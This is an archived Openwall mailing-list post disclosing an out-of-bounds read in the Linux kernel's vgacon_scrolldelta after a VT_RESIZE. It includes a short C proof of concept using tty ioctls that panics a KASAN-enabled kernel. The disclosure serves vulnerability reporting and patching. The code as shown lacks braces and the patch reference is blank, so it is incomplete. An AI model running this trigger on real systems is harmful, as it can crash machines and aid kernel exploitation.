Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 16 Sep 2020 16:19:46 +0800
From: NopNop Nop <>
Subject: Linux Kernel: out-of-bounds reading in vgacon_scrolldelta


We found a out-of-bounds reading in vgacon_scrolldelta. This BUG is caused
by "soff" being negative after VT_RESIZE.

Our PoC (panic with CONFIG_KASAN=y):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char** argv)
        int fd = open("/dev/tty1", O_RDWR, 0);

        unsigned short size[3] = {4, 0x254, 0};
        ioctl(fd, 0x5609, size);

        for (int i = 0; i < 110; i++) {
                write(fd, "\x0a", 1);
        signed int args[3] = {13, -0x400, 0};
        ioctl(fd, 0x541c, args);

Here is the commit to patch this BUG:


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.